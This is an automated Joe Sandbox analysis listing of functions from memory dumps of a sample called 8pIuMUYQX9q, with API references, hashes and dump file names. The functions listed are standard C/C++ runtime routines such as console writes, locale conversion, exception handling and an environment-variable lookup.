Opcode ID: f5f0b81ebe772744bb5fb93888e05b6f5305ec736c0582bb0177592f4c9b6305
Instruction ID: b0683a1faa42e491f5465bcbae90ae03028f310232990994fc06c4707e22aedf
Opcode Fuzzy Hash: f5f0b81ebe772744bb5fb93888e05b6f5305ec736c0582bb0177592f4c9b6305
Instruction Fuzzy Hash: 18215821E2D64382F664AF28A4953BE62A5FF84780F045035EB4EC76C6CF7CE8448B40

Function 000000018005F068 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000018005F099
GetLastError.KERNEL32 ref: 000000018005F0A5
CloseHandle.KERNEL32 ref: 000000018005F0BD
CreateFileW.KERNEL32 ref: 000000018005F0E8
WriteConsoleW.KERNEL32 ref: 000000018005F107

Strings

CONOUT$, xrefs: 000000018005F0C9

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: a1ad796ef4d2b0a9fb17933e5516246b522f55992cf6c1b405d77653a953f26f
Instruction ID: 96a6549b135438e458a974aa9ef704a346fc1f702dab32dc7b3a3e6495f6e225
Opcode Fuzzy Hash: a1ad796ef4d2b0a9fb17933e5516246b522f55992cf6c1b405d77653a953f26f
Instruction Fuzzy Hash: 1711B232314B8486E3918B02FC4435962A1F79DFE4F148314FA699B794CF3CCA888700

Function 00007FFE1A531240 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE1A531271
GetLastError.KERNEL32 ref: 00007FFE1A53127D
CloseHandle.KERNEL32 ref: 00007FFE1A531295
CreateFileW.KERNEL32 ref: 00007FFE1A5312C0
WriteConsoleW.KERNEL32 ref: 00007FFE1A5312DF

Strings

CONOUT$, xrefs: 00007FFE1A5312A1

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ee5c588772e49caf0cb406f0c8d97ef9268a1050ba182dcfc4c0e4454617f1aa
Instruction ID: afa2a826b2e65e97a373a574085baa25ae8fffd5dbbafdee89ac84a0978dc45f
Opcode Fuzzy Hash: ee5c588772e49caf0cb406f0c8d97ef9268a1050ba182dcfc4c0e4454617f1aa
Instruction Fuzzy Hash: 55116721B1CF4182E7508B53B844339BAB4BB8AFB5F0442B6EA5E877A5DF7CD8148744

Function 00007FFE1A518C04 Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFE1A518C74
MultiByteToWideChar.KERNEL32 ref: 00007FFE1A518D12
LCMapStringEx.KERNEL32 ref: 00007FFE1A518D7B
LCMapStringEx.KERNEL32 ref: 00007FFE1A518DCD
LCMapStringEx.KERNEL32 ref: 00007FFE1A518E72
WideCharToMultiByte.KERNEL32 ref: 00007FFE1A518ECC

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 84a5bd0abc0fc62f0b45126e4c4e84cf99e29129edb9dfa3629f172b4d95d358
Instruction ID: 548acf6dad11a819e80f62496aaa0bff3a971ba778b134666fe3b21395f0e5f2
Opcode Fuzzy Hash: 84a5bd0abc0fc62f0b45126e4c4e84cf99e29129edb9dfa3629f172b4d95d358
Instruction Fuzzy Hash: 78819F72B0CB8186EB218F22A44067962E2FF95BB8F1406F2EA5D47BE4DF3CD4408700

Function 0000000180037C1C Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000000180037C8E
MultiByteToWideChar.KERNEL32 ref: 0000000180037D36
LCMapStringEx.KERNEL32 ref: 0000000180037D6D
LCMapStringEx.KERNEL32 ref: 0000000180037DC6
LCMapStringEx.KERNEL32 ref: 0000000180037E73
WideCharToMultiByte.KERNEL32 ref: 0000000180037EB5

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: baee044f58e934cce0be5d9085b85ba6dff26b86d8aaffd532257138d68a690a
Instruction ID: 4aace7600e58a4aebbafb2e39b9406912d7d7f1d68f00f1078c929dc3c53059f
Opcode Fuzzy Hash: baee044f58e934cce0be5d9085b85ba6dff26b86d8aaffd532257138d68a690a
Instruction Fuzzy Hash: 3781723231074886EBB28F21E4503AA67A5FB4CBECF158615FA5D17BD5DF78CA498700

Function 000000018001F0F0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018001F11B
std::_Lockit::_Lockit.LIBCPMT ref: 000000018001F140
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001F16A
std::_Facet_Register.LIBCPMT ref: 000000018001F1E1
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001F1FB
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001F223

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 838a813e91ff4de3fb066eb8ab6c3112bb8f16af8c2bc6a5fa4b20ee25e1721b
Instruction ID: 69d2c518681240fb664e7080d6c901fb45b7e67c31dea812c10aff418db5db21
Opcode Fuzzy Hash: 838a813e91ff4de3fb066eb8ab6c3112bb8f16af8c2bc6a5fa4b20ee25e1721b
Instruction Fuzzy Hash: 87313B32204A48D5EBA3DF15E8403EA7760F79CBD4F598612BA9D4B7A6DE38C7498700

Function 00000001800221D0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000001800221FB
std::_Lockit::_Lockit.LIBCPMT ref: 0000000180022220
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018002224A
std::_Facet_Register.LIBCPMT ref: 00000001800222C1
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001800222DB
Concurrency::cancel_current_task.LIBCPMT ref: 0000000180022303

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 5997ff2f059ca893d9e5f4be5cc07012e81853e22b410a1ff3418114650dc760
Instruction ID: 73d55b46543ed4b3991dea04930f734e4a8c84d005fd8119d240e07948fd7fcd
Opcode Fuzzy Hash: 5997ff2f059ca893d9e5f4be5cc07012e81853e22b410a1ff3418114650dc760
Instruction Fuzzy Hash: 06314D32204A48A5EAA7DF55E8403EA7360F79CBD4F598212FAAD077A5DF38D749C700

Function 000000018002A2A0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018002A2CB
std::_Lockit::_Lockit.LIBCPMT ref: 000000018002A2F0
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018002A31A
std::_Facet_Register.LIBCPMT ref: 000000018002A391
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018002A3AB
Concurrency::cancel_current_task.LIBCPMT ref: 000000018002A3D3

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 9819a13d9c60745ad823b8439c88a51fd34abc03fdd2074c405faed724ec3ee5
Instruction ID: e47428da0e333fafce75627f9691568b590d6648a270eb16155edb2485eb1823
Opcode Fuzzy Hash: 9819a13d9c60745ad823b8439c88a51fd34abc03fdd2074c405faed724ec3ee5
Instruction Fuzzy Hash: 44313232214A4886FAA7DF15E8403DA73A0F79DBD4F498211FA9D477A5DF38C7498700

Function 000000018001F920 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018001F94B
std::_Lockit::_Lockit.LIBCPMT ref: 000000018001F970
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001F99A
std::_Facet_Register.LIBCPMT ref: 000000018001FA11
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001FA2B
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001FA53

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 59f9712774920871ec8af81a2ac70f18776b1c3351c0f20efc0266df140ba93b
Instruction ID: ffc43c9853b47b15e6367875935f868481117279b9b05a275079cccaf2b006ad
Opcode Fuzzy Hash: 59f9712774920871ec8af81a2ac70f18776b1c3351c0f20efc0266df140ba93b
Instruction Fuzzy Hash: EC316372205F4885EBA3EF15E8403EA77A0F78CBD4F598512BA9D473A6DE38C7498700

Function 000000018001EFB0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018001EFDB
std::_Lockit::_Lockit.LIBCPMT ref: 000000018001F000
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001F02A
std::_Facet_Register.LIBCPMT ref: 000000018001F0A1
std::_Lockit::~_Lockit.LIBCPMT ref: 000000018001F0BB
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001F0E3

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: e7a01324591cc6adb2776662067b7254601b6ef66a2dbe2b61eb88c8732cc3f9
Instruction ID: 5095ce55e9b556fbfdd6a06f9da07d2e60b47175b675a18cfc0792ee3b2d6772
Opcode Fuzzy Hash: e7a01324591cc6adb2776662067b7254601b6ef66a2dbe2b61eb88c8732cc3f9
Instruction Fuzzy Hash: A4312D32204E4885EBA7DF15E8403EA7760F79CBD4F598212BA9D477A6DF38D7498700

Function 000000018003667C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180036691
std::_Lockit::_Lockit.LIBCPMT ref: 00000001800366B6
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001800366E0
std::_Facet_Register.LIBCPMT ref: 0000000180036757
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180036778
Concurrency::cancel_current_task.LIBCPMT ref: 000000018003678B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 53dbb93e994af58bf2c83a45c21cfdd500d86c9bd7dba13f91d359cd3c017317
Instruction ID: e797ca4a698a6a70502401898f30e3285427b25cb8c3814f15a5a2b486cbe21a
Opcode Fuzzy Hash: 53dbb93e994af58bf2c83a45c21cfdd500d86c9bd7dba13f91d359cd3c017317
Instruction Fuzzy Hash: B4319636705A4881EB879B15D8403EAA760F74CBE4F4AC121FA59477F5DF38D64A8300

Function 00007FFE1A51B194 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A51B332
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A51B65B

Strings

csm, xrefs: 00007FFE1A51B279
csm, xrefs: 00007FFE1A51B359
csm, xrefs: 00007FFE1A51B2DB

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 670c25dac7a1d7d9d996a65e96f0d857a2530fcdebd4051afe772957d6dcc5a6
Instruction ID: 58d87c9288ddaa9b08a04007a404b24fa4514cc407249950620732c9731bacf2
Opcode Fuzzy Hash: 670c25dac7a1d7d9d996a65e96f0d857a2530fcdebd4051afe772957d6dcc5a6
Instruction Fuzzy Hash: E6E1D372B0CB828AE7119F26D4402BD37A2FB56BA8F1102F6DE5D57666DF38E485C700

Function 000000018003C944 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018003CAE2
std::bad_alloc::bad_alloc.LIBCMT ref: 000000018003CE05

Strings

csm, xrefs: 000000018003CA8B
csm, xrefs: 000000018003CB09
csm, xrefs: 000000018003CA29

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 6627fe2a64a17ac0553c4b3a6d846d3f8b96a430138be556814e7c2fd70f9292
Instruction ID: f5411b345c8792d60bd3580347487c6cce2b0598e9f22bcdad09514a5929b0be
Opcode Fuzzy Hash: 6627fe2a64a17ac0553c4b3a6d846d3f8b96a430138be556814e7c2fd70f9292
Instruction Fuzzy Hash: 3AE19F72614A888AE793DF74D4807DE3BA0F749788F168116FB8997696CF34C689C702

Function 00007FF6B40A97B0 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__initconout.LIBCMT ref: 00007FF6B40A97DE

Part of subcall function 00007FF6B40A9DD4: CreateFileA.KERNEL32 ref: 00007FF6B40A9DFD

WriteConsoleW.KERNEL32 ref: 00007FF6B40A980A
GetLastError.KERNEL32 ref: 00007FF6B40A9825
GetConsoleOutputCP.KERNEL32(?,?,?,?,00007FF6B40A7E74,?,?,?,00000001,00000000,?,00000001,00007FF6B40A8378,?,?,00000000), ref: 00007FF6B40A9837
WideCharToMultiByte.KERNEL32 ref: 00007FF6B40A986A
WriteConsoleA.KERNEL32 ref: 00007FF6B40A9890

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
String ID:
API String ID: 2210154019-0
Opcode ID: 884de272c870c06c8b3e6bffd89ed74338962804be70bccc41670ff47b7c2279
Instruction ID: 75a0d15dffd078a4f74150ba5beea00445977e279e0593873ee76b71dfa76fba
Opcode Fuzzy Hash: 884de272c870c06c8b3e6bffd89ed74338962804be70bccc41670ff47b7c2279
Instruction Fuzzy Hash: A9312D21B18A4286EB508F18E48837A73B0FF85764F500735E7AD869E4DF7DD445CB01

Function 00007FFE1A5236BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A5236CB
FlsSetValue.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A523701
FlsSetValue.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A52372E
FlsSetValue.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A52373F
FlsSetValue.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A523750
SetLastError.KERNEL32(?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000,00007FFE1A52A407,?,?,?), ref: 00007FFE1A52376B

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 343f6b83210cc47065e096af2d9712709cbe0250fb03126c5df775aa5638cf4f
Instruction ID: c3c2ee043ab76be143583c433d0d22b8104ce24286fac5884dc72b4da81c9772
Opcode Fuzzy Hash: 343f6b83210cc47065e096af2d9712709cbe0250fb03126c5df775aa5638cf4f
Instruction Fuzzy Hash: EA113828B4CA4282FA5963A3665117D25636F4AFB0F4847F7E93E067E7EE2CB4014700

Function 00007FF6B40A2F80 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A2F8A
FlsGetValue.KERNEL32(?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A2F98
SetLastError.KERNEL32(?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A2FF0

Part of subcall function 00007FF6B40A6790: Sleep.KERNEL32(?,?,0000000A,00007FF6B40A2FB3,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A67D5

FlsSetValue.KERNEL32(?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A2FC4
free.LIBCMT ref: 00007FF6B40A2FE7

Part of subcall function 00007FF6B40A2ECC: _lock.LIBCMT ref: 00007FF6B40A2F1C
Part of subcall function 00007FF6B40A2ECC: _lock.LIBCMT ref: 00007FF6B40A2F3C

GetCurrentThreadId.KERNEL32 ref: 00007FF6B40A2FD8

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 961ff8c3743a2f08582c764c56b8dee98b1204cb99b4fe408757a86bbce5ea78
Instruction ID: 7468f78ed6f8e1e72fb110e5ec05009fb01b647e676e3b96d2af8a879ad4abc2
Opcode Fuzzy Hash: 961ff8c3743a2f08582c764c56b8dee98b1204cb99b4fe408757a86bbce5ea78
Instruction Fuzzy Hash: 51016725A0974386FB559F6DA8D843C62A1EF88760F584638DB2DC63D9EE3CF444C211

Function 000000018003B6E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000000018003B70F
_IsNonwritableInCurrentImage.LIBCMT ref: 000000018003B7A4
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,000000018003963A), ref: 000000018003B7F3

Strings

f, xrefs: 000000018003B722
csm, xrefs: 000000018003B78A

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 84c4132c87aeab06283ac0c76006560f10b85e2fcb4d41a683c038b0c7f60683
Instruction ID: ee0528af0de01edb7d311eab628256f1aba46b84c911e9381c6fad5d8fe02784
Opcode Fuzzy Hash: 84c4132c87aeab06283ac0c76006560f10b85e2fcb4d41a683c038b0c7f60683
Instruction Fuzzy Hash: 6151AF3261164886EB97DB25E844B9A3799F388BCCF52C521FB5687788DF34CA49CB00

Function 0000000180008CA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 0000000180008D1E

Strings

USERNAME, xrefs: 0000000180008D17

